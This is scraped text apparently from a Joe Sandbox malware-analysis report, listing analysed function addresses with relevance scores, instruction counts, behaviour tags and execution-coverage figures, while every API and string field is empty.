|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 005196C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82processCOMMON
C-Code - Quality: 30% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00503990 Relevance: 1.6, APIs: 1, Instructions: 86fileCOMMON
C-Code - Quality: 37% |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0050E11C Relevance: 1.6, APIs: 1, Instructions: 80fileCOMMON
C-Code - Quality: 43% |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Execution Graph
Execution Coverage: | 11.6% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 0% |
Total number of Nodes: | 72 |
Total number of Limit Nodes: | 10 |
Graph
Function 001D0000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02127414 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130processCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Execution Graph
Execution Coverage: | 23.7% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 0% |
Total number of Nodes: | 62 |
Total number of Limit Nodes: | 10 |
Graph
Function 002C0000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02155A84 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 101networkCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 021423A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102threadCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02154368 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119networkCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 021A8D9C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93networkCOMMON
C-Code - Quality: 21% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 021B96C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82processCOMMON
C-Code - Quality: 30% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 021A3990 Relevance: 1.6, APIs: 1, Instructions: 86fileCOMMON
C-Code - Quality: 37% |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 021AE11C Relevance: 1.6, APIs: 1, Instructions: 80fileCOMMON
C-Code - Quality: 43% |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 001B0000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00297414 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130processCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00130000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 020E5A84 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 101networkCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 020E4368 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119networkCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00140000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 020F7414 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130processCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00130000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00295A84 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 101networkCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00294368 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119networkCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |